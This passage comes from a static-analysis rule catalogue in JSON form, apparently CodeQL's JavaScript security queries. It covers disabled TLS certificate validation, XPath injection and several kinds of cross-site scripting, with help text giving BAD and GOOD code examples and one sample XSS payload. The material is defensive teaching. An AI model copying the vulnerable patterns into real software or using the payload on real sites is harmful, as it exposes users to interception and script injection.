[CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n"},"properties":{"tags":["security","external/cwe/cwe-300","external/cwe/cwe-319","external/cwe/cwe-494","external/cwe/cwe-829"],"description":"Using unencrypted protocols to fetch dependencies can leave an application\n              open to man-in-the-middle attacks.","id":"js/insecure-dependency","kind":"problem","name":"Dependency download using unencrypted communication channel","precision":"high","problem.severity":"warning","security-severity":"8.1"}},{"id":"js/disabling-certificate-validation","name":"js/disabling-certificate-validation","shortDescription":{"text":"Disabling certificate validation"},"fullDescription":{"text":"Disabling cryptographic certificate validation can cause security vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n  {\n    hostname: \"secure.my-online-bank.com\",\n    port: 443,\n    method: \"POST\",\n    path: \"send-confidential-information\",\n    rejectUnauthorized: false // BAD\n  },\n  response => {\n    // ... communicate with secure.my-online-bank.com\n  }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n","markdown":"# Disabling certificate validation\nCertificate validation is the standard authentication method of a secure TLS connection. Without it, there is no guarantee about who the other party of a TLS connection is, making man-in-the-middle attacks more likely to occur\n\nWhen testing software that uses TLS connections, it may be useful to disable the certificate validation temporarily. But disabling it in production environments is strongly discouraged, unless an alternative method of authentication is used.\n\n\n## Recommendation\nDo not disable certificate validation for TLS connections.\n\n\n## Example\nThe following example shows a HTTPS connection that transfers confidential information to a remote server. But the connection is not secure since the `rejectUnauthorized` option of the connection is set to `false`. As a consequence, anyone can impersonate the remote server, and receive the confidential information.\n\n\n```javascript\nlet https = require(\"https\");\n\nhttps.request(\n  {\n    hostname: \"secure.my-online-bank.com\",\n    port: 443,\n    method: \"POST\",\n    path: \"send-confidential-information\",\n    rejectUnauthorized: false // BAD\n  },\n  response => {\n    // ... communicate with secure.my-online-bank.com\n  }\n);\n\n```\nTo make the connection secure, the `rejectUnauthorized` option should have its default value, or be explicitly set to `true`.\n\n\n## References\n* Wikipedia: [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security)\n* Wikipedia: [Man-in-the-middle attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Node.js: [TLS (SSL)](https://nodejs.org/api/tls.html)\n* Common Weakness Enumeration: [CWE-295](https://cwe.mitre.org/data/definitions/295.html).\n* Common Weakness Enumeration: [CWE-297](https://cwe.mitre.org/data/definitions/297.html).\n"},"properties":{"tags":["security","external/cwe/cwe-295","external/cwe/cwe-297"],"description":"Disabling cryptographic certificate validation can cause security vulnerabilities.","id":"js/disabling-certificate-validation","kind":"problem","name":"Disabling certificate validation","precision":"very-high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/xpath-injection","name":"js/xpath-injection","shortDescription":{"text":"XPath injection"},"fullDescription":{"text":"Building an XPath expression from user-controlled sources is vulnerable to insertion of malicious code by the user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n  let userName = req.param(\"userName\");\n\n  // BAD: Use user-provided data directly in an XPath expression\n  let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n  badXPathExpr.select({\n    node: root\n  });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n  let userName = req.param(\"userName\");\n\n  // GOOD: Embed user-provided data using variables\n  let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n  goodXPathExpr.select({\n    node: root,\n    variables: { userName: userName }\n  });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n","markdown":"# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n  let userName = req.param(\"userName\");\n\n  // BAD: Use user-provided data directly in an XPath expression\n  let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n  badXPathExpr.select({\n    node: root\n  });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n  let userName = req.param(\"userName\");\n\n  // GOOD: Embed user-provided data using variables\n  let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n  goodXPathExpr.select({\n    node: root,\n    variables: { userName: userName }\n  });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n"},"properties":{"tags":["security","external/cwe/cwe-643"],"description":"Building an XPath expression from user-controlled sources is vulnerable to insertion of\n              malicious code by the user.","id":"js/xpath-injection","kind":"path-problem","name":"XPath injection","precision":"high","problem.severity":"error","security-severity":"9.8"}},{"id":"js/html-constructed-from-input","name":"js/html-constructed-from-input","shortDescription":{"text":"Unsafe HTML constructed from library input"},"fullDescription":{"text":"Using externally controlled strings to construct HTML might allow a malicious user to perform a cross-site scripting attack."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n  document.getElementById('name').innerHTML = \"<b>\" + name + \"</b>\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n  const bold = document.createElement('b');\n  bold.innerText = name;\n  document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n  document.getElementById('name').innerHTML = \"<b>\" + striptags(name) + \"</b>\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n  document.getElementById('name').innerHTML = \"<b>\" + name + \"</b>\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n  const bold = document.createElement('b');\n  bold.innerText = name;\n  document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n  document.getElementById('name').innerHTML = \"<b>\" + striptags(name) + \"</b>\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Using externally controlled strings to construct HTML might allow a malicious\n              user to perform a cross-site scripting attack.","id":"js/html-constructed-from-input","kind":"path-problem","name":"Unsafe HTML constructed from library input","precision":"high","problem.severity":"error","security-severity":"6.1"}},{"id":"js/stored-xss","name":"js/stored-xss","shortDescription":{"text":"Stored cross-site scripting"},"fullDescription":{"text":"Using uncontrolled stored values in HTML allows for a stored cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n    fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n    fs.readdir('/public', function (error, fileNames) {\n        var list = '<ul>';\n        fileNames.forEach(fileName => {\n            // BAD: `fileName` can contain HTML elements\n            list += '<li>' + fileName + '</li>';\n        });\n        list += '</ul>'\n        res.send(list);\n    });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n    fs = require('fs'),\n    escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n    fs.readdir('/public', function (error, fileNames) {\n        var list = '<ul>';\n        fileNames.forEach(fileName => {\n            // GOOD: escaped `fileName` can not contain HTML elements\n            list += '<li>' + escape(fileName) + '</li>';\n        });\n        list += '</ul>'\n        res.send(list);\n    });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n    fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n    fs.readdir('/public', function (error, fileNames) {\n        var list = '<ul>';\n        fileNames.forEach(fileName => {\n            // BAD: `fileName` can contain HTML elements\n            list += '<li>' + fileName + '</li>';\n        });\n        list += '</ul>'\n        res.send(list);\n    });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n    fs = require('fs'),\n    escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n    fs.readdir('/public', function (error, fileNames) {\n        var list = '<ul>';\n        fileNames.forEach(fileName => {\n            // GOOD: escaped `fileName` can not contain HTML elements\n            list += '<li>' + escape(fileName) + '</li>';\n        });\n        list += '</ul>'\n        res.send(list);\n    });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Using uncontrolled stored values in HTML allows for\n              a stored cross-site scripting vulnerability.","id":"js/stored-xss","kind":"path-problem","name":"Stored cross-site scripting","precision":"high","problem.severity":"error","security-severity":"7.8"}},{"id":"js/reflected-xss","name":"js/reflected-xss","shortDescription":{"text":"Reflected cross-site scripting"},"fullDescription":{"text":"Writing user input directly to an HTTP response allows for a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) directly to the response. This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n  if (!isValidUserId(req.params.id))\n    // BAD: a request parameter is incorporated without validation into the response\n    res.send(\"Unknown user: \" + req.params.id);\n  else\n    // TODO: do something exciting\n    ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n  if (!isValidUserId(req.params.id))\n    // GOOD: request parameter is sanitized before incorporating it into the response\n    res.send(\"Unknown user: \" + escape(req.params.id));\n  else\n    // TODO: do something exciting\n    ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Reflected cross-site scripting\nDirectly writing user input (for example, an HTTP request parameter) to an HTTP response without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *reflected* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the response, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes part of an HTTP request (which is controlled by the user) directly to the response. This leaves the website vulnerable to cross-site scripting.\n\n\n```javascript\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n  if (!isValidUserId(req.params.id))\n    // BAD: a request parameter is incorporated without validation into the response\n    res.send(\"Unknown user: \" + req.params.id);\n  else\n    // TODO: do something exciting\n    ;\n});\n\n```\nSanitizing the user-controlled data prevents the vulnerability:\n\n\n```javascript\nvar escape = require('escape-html');\n\nvar app = require('express')();\n\napp.get('/user/:id', function(req, res) {\n  if (!isValidUserId(req.params.id))\n    // GOOD: request parameter is sanitized before incorporating it into the response\n    res.send(\"Unknown user: \" + escape(req.params.id));\n  else\n    // TODO: do something exciting\n    ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Writing user input directly to an HTTP response allows for\n              a cross-site scripting vulnerability.","id":"js/reflected-xss","kind":"path-problem","name":"Reflected cross-site scripting","precision":"high","problem.severity":"error","security-severity":"7.8"}},{"id":"js/xss-through-dom","name":"js/xss-through-dom","shortDescription":{"text":"DOM text reinterpreted as HTML"},"fullDescription":{"text":"Reinterpreting text from the DOM as HTML can lead to a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n    var target = $(this).attr(\"data-target\");\n    $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n    var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# DOM text reinterpreted as HTML\nExtracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.\n\nA webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.\n\n\n## Example\nThe following example shows a webpage using a `data-target` attribute to select and manipulate a DOM element using the JQuery library. In the example, the `data-target` attribute is read into the `target` variable, and the `$` function is then supposed to use the `target` variable as a CSS selector to determine which element should be manipulated.\n\n\n```javascript\n$(\"button\").click(function () {\n    var target = $(this).attr(\"data-target\");\n    $(target).hide();\n});\n\n```\nHowever, if an attacker can control the `data-target` attribute, then the value of `target` can be used to cause the `$` function to execute arbitrary JavaScript.\n\nThe above vulnerability can be fixed by using `$.find` instead of `$`. The `$.find` function will only interpret `target` as a CSS selector and never as HTML, thereby preventing an XSS attack.\n\n\n```javascript\n$(\"button\").click(function () {\n    var target = $(this).attr(\"data-target\");\n\t$.find(target).hide();\n});\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Reinterpreting text from the DOM as HTML\n              can lead to a cross-site scripting vulnerability.","id":"js/xss-through-dom","kind":"path-problem","name":"DOM text reinterpreted as HTML","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/xss-through-exception","name":"js/xss-through-exception","shortDescription":{"text":"Exception text reinterpreted as HTML"},"fullDescription":{"text":"Reinterpreting text from an exception as HTML can lead to a cross-site scripting vulnerability."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n    var href = document.location.href,\n        deflt = href.substring(href.indexOf(\"default=\")+8);\n    \n    try {\n        var parsed = unknownParseFunction(deflt); \n    } catch(e) {\n        document.write(\"Had an error: \" + e + \".\");\n    }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n    if (!ajv.validate('pollData', req.body)) {\n        res.send(ajv.errorsText());\n    }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. For example, the input `{'<img src=x onerror=alert(1)>': 'foo'}` will generate the error `data/<img src=x onerror=alert(1)> should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Exception text reinterpreted as HTML\nDirectly writing error messages to a webpage without sanitization allows for a cross-site scripting vulnerability if parts of the error message can be influenced by a user.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before writing user input to the page, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example shows an exception being written directly to the document, and this exception can potentially be influenced by the page URL, leaving the website vulnerable to cross-site scripting.\n\n\n```javascript\nfunction setLanguageOptions() {\n    var href = document.location.href,\n        deflt = href.substring(href.indexOf(\"default=\")+8);\n    \n    try {\n        var parsed = unknownParseFunction(deflt); \n    } catch(e) {\n        document.write(\"Had an error: \" + e + \".\");\n    }\n}\n\n```\n\n## Example\nThis second example shows an input being validated using the JSON schema validator `ajv`, and in case of an error, the error message is sent directly back in the response.\n\n\n```javascript\nimport express from 'express';\nimport Ajv from 'ajv';\n\nlet app = express();\nlet ajv = new Ajv();\n\najv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollData');\n\napp.post('/polldata', (req, res) => {\n    if (!ajv.validate('pollData', req.body)) {\n        res.send(ajv.errorsText());\n    }\n});\n\n```\nThis is unsafe, because the error message can contain parts of the input. For example, the input `{'<img src=x onerror=alert(1)>': 'foo'}` will generate the error `data/<img src=x onerror=alert(1)> should be number`, causing reflected XSS.\n\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness 